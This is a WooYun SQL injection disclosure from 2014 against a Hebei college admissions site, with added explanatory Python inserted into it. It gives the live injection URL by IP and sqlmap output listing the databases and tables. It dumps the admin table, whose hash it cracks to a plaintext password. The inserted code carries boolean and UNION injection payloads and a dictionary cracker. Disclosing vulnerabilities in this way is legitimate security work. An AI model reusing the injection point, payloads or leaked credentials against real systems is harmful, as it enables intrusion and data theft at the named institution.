
Vulnerability summary

Defect ID: wooyun-2014-066046

Title: SQL injection in a sub-site of a university in Hebei

Related vendor: CNCERT (National Internet Emergency Center)

Author: 浮萍

Submitted: 2014-06-24 15:28

Fix time: 2014-06-29 15:28

Published: 2014-06-29 15:28

Type: SQL injection

Severity: Medium

Self-rated Rank: 8

Status: Handed to a third-party partner organization (CCERT, the CERNET emergency response group) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-06-24: Details sent to the vendor; awaiting vendor handling
2014-06-29: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

The admissions information site of 河北软件职业技术学院 (Hebei Software Institute) has SQL injection.

[Screenshot: Snap1.jpg]


Injection point
http://221.192.237.91/zsnew/news.php?id=382
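As an added illustration (not code from the report, and not the site's own source, which the report does not show), the following Python stand-in demonstrates the query-construction bug that an injectable `news.php?id=` parameter implies. An in-memory SQLite database with constructed sample rows replaces the site's MySQL server; the table and column names are assumptions. The pattern is what matters: concatenating the raw `id` into the SQL text versus validating it and binding it as a parameter, which in PHP maps directly onto PDO prepared statements.

```python
import re
import sqlite3

# Constructed sample data standing in for the site's database (names are assumptions).
NEWS_ROWS = [(381, "Open day"), (382, "Admissions plan"), (383, "Tuition")]
ADMIN_ROWS = [("admin", "secret-hash")]


def build_db():
    """Create an in-memory SQLite database with a news table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.execute("CREATE TABLE admins (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", NEWS_ROWS)
    conn.executemany("INSERT INTO admins VALUES (?, ?)", ADMIN_ROWS)
    conn.commit()
    return conn


def fetch_news_vulnerable(conn, id_param):
    """The bug class behind news.php?id=: the raw request value is pasted into the SQL text,
    so whatever follows id= in the URL becomes part of the WHERE clause."""
    sql = "SELECT id, title FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def fetch_news_safe(conn, id_param):
    """Validate that id is a short decimal integer, then bind it as a parameter.
    Returns None for a malformed id (the caller should answer 400)."""
    if not re.fullmatch(r"[0-9]{1,10}", id_param):
        return None
    return conn.execute("SELECT id, title FROM news WHERE id=?", (int(id_param),)).fetchall()


def demo():
    """Run a normal id, a boolean payload and a UNION payload through both handlers."""
    conn = build_db()
    payloads = {
        "normal": "382",
        "boolean": "382 OR 1=1",
        "union": "-1 UNION ALL SELECT 1, name || ':' || password FROM admins",
    }
    return {
        name: {"vulnerable": fetch_news_vulnerable(conn, p), "safe": fetch_news_safe(conn, p)}
        for name, p in payloads.items()
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The boolean payload makes the vulnerable handler return every row, and the UNION payload pulls the admin table through the same SELECT, which is exactly the path by which the report reaches hbsi_admin; the safe handler rejects both before any SQL runs.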

[Screenshot: Snap2.jpg]


Web application information (sqlmap fingerprint). The application connects as root@localhost with DBA rights, so one injectable parameter exposes every database on the server, which is why the listing below reaches beyond the site's own database.

web server operating system: Windows
web application technology: PHP 5.3.5, Apac
back-end DBMS: MySQL 5.0
banner: '5.1.22-rc-community'
current user: 'root@localhost'
current database: 'shuyuan'
current user is DBA: True
database management system users [1]:
[*] 'root'@'localhost'


Databases

available databases [6]:
[*] admissions
[*] information_schema
[*] mysql
[*] shuyuan
[*] test
[*] zhaosheng


Tables in zhaosheng

Database: zhaosheng
[88 tables]
+-----------------------+
| hbsi_addonarticle |
| hbsi_addonimages |
| hbsi_addoninfos |
| hbsi_addonshop |
| hbsi_addonsoft |
| hbsi_addonspec |
| hbsi_admin |
| hbsi_admintype |
| hbsi_advancedsearch |
| hbsi_arcatt |
| hbsi_arccache |
| hbsi_archives |
| hbsi_arcmulti |
| hbsi_arcrank |
| hbsi_arctiny |
| hbsi_arctype |
| hbsi_area |
| hbsi_channeltype |
| hbsi_co_htmls |
| hbsi_co_mediaurls |
| hbsi_co_note |
| hbsi_co_onepage |
| hbsi_co_urls |
| hbsi_diyforms |
| hbsi_dl_log |
| hbsi_downloads |
| hbsi_erradd |
| hbsi_feedback |
| hbsi_flink |
| hbsi_flinktype |
| hbsi_freelist |
| hbsi_guestbook |
| hbsi_homepageset |
| hbsi_keywords |
| hbsi_log |
| hbsi_member |
| hbsi_member_company |
| hbsi_member_feed |
| hbsi_member_flink |
| hbsi_member_friends |
| hbsi_member_group |
| hbsi_member_guestbook |
| hbsi_member_model |
| hbsi_member_msg |
| hbsi_member_operation |
| hbsi_member_person |
| hbsi_member_pms |
| hbsi_member_snsmsg |
| hbsi_member_space |
| hbsi_member_stow |
| hbsi_member_stowtype |
| hbsi_member_tj |
| hbsi_member_type |
| hbsi_member_vhistory |
| hbsi_moneycard_record |
| hbsi_moneycard_type |
| hbsi_mtypes |
| hbsi_multiserv_config |
| hbsi_myad |
| hbsi_myadtype |
| hbsi_mytag |
| hbsi_payment |
| hbsi_plus |
| hbsi_purview |
| hbsi_pwd_tmp |
| hbsi_ratings |
| hbsi_scores |
| hbsi_search_cache |
| hbsi_search_keywords |
| hbsi_sgpage |
| hbsi_shops_delivery |
| hbsi_shops_orders |
| hbsi_shops_products |
| hbsi_shops_userinfo |
| hbsi_softconfig |
| hbsi_sphinx |
| hbsi_stepselect |
| hbsi_sys_enum |
| hbsi_sys_module |
| hbsi_sys_set |
| hbsi_sys_task |
| hbsi_sysconfig |
| hbsi_tagindex |
| hbsi_taglist |
| hbsi_uploads |
| hbsi_verifies |
| hbsi_vote |
| hbsi_vote_member |
+-----------------------+


Data in zhaosheng.hbsi_admin

Database: zhaosheng
Table: hbsi_admin
[10 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| email | char(30) |
| id | int(10) unsigned |
| loginip | varchar(20) |
| logintime | int(10) unsigned |
| pwd | char(32) |
| tname | char(30) |
| typeid | text |
| uname | char(20) |
| userid | char(30) |
| usertype | float unsigned |
+-----------+------------------+


Database: zhaosheng
Table: hbsi_admin
[1 entry]
+----------------------+---------+-------+
| pwd | tname | uname |
+----------------------+---------+-------+
| 6cedc285ea3b5c2015f0 | <blank> | admin |
+----------------------+---------+-------+


Cracking the hash gives the password hbsi123.
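The dumped pwd value is 20 hex characters, not the 32 of a full MD5. The hbsi_* table set and the hbsi_admin column layout match the admin table of DedeCMS, which stores substr(md5(password), 5, 20); that identification is an inference from the schema, not something the report states. The following Python, added here and not part of the report, reproduces that truncated hash, checks whether the report's hash and password are consistent with it, and runs a constructed wordlist against a hash of a made-up password.

```python
import hashlib
from typing import Iterable, Optional

# Values taken from the report above.
REPORTED_HASH = "6cedc285ea3b5c2015f0"
REPORTED_PASSWORD = "hbsi123"


def md5_hex(password: str) -> str:
    """Full 32-character hex MD5 of the UTF-8 encoded password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_admin_hash(password: str) -> str:
    """20-character admin hash: characters 5..24 of the MD5 hex digest.
    This is the DedeCMS admin-table convention (substr(md5($pwd), 5, 20)); that the
    hbsi_admin table follows it is an inference from the schema, not stated in the report."""
    return md5_hex(password)[5:25]


def matches(stored: str, candidate: str) -> bool:
    """Compare a candidate password against a stored hash, accepting either the
    20-character truncated form or a full 32-character MD5."""
    stored = stored.strip().lower()
    if len(stored) == 20:
        return dede_admin_hash(candidate) == stored
    if len(stored) == 32:
        return md5_hex(candidate) == stored
    raise ValueError(f"unexpected hash length {len(stored)}")


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry whose hash matches, or None.
    Unsalted MD5, truncated or not, reduces recovery to a cheap dictionary check."""
    for candidate in wordlist:
        if matches(stored, candidate):
            return candidate
    return None


def check_report_claim() -> bool:
    """Does the password the report gives reproduce the hash the report dumped?"""
    return matches(REPORTED_HASH, REPORTED_PASSWORD)


if __name__ == "__main__":
    print("report's hash/password pair consistent:", check_report_claim())
    demo_wordlist = ["123456", "admin", "hbsi", "hbsi123", "admin888"]  # constructed
    print("recovered:", crack(dede_admin_hash("admin888"), demo_wordlist))
```

Running check_report_claim() tells you whether the report's "decryption" is simply this truncated-MD5 lookup; if it returns False, the hashing scheme assumed here is wrong for this site and the lookup was done some other way.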

Database: shuyuan
[9 tables]
+---------+
| actives |
| admins |
| baoming |
| columns |
| focimgs |
| hzyx |
| links |
| news |
| notes |
+---------+


Database: shuyuan
Table: admins
[6 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| grade | varchar(100) |
| id | int(11) |
| instime | int(11) |
| lasttime | int(11) |
| name | varchar(20) |
| password | varchar(32) |
+----------+--------------+

Proof of vulnerability:

(Identical to the detailed description above.)


Fix recommendation:

Copyright notice: please credit 浮萍@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2014-06-29 15:28

Vendor reply:

Latest status:

None yet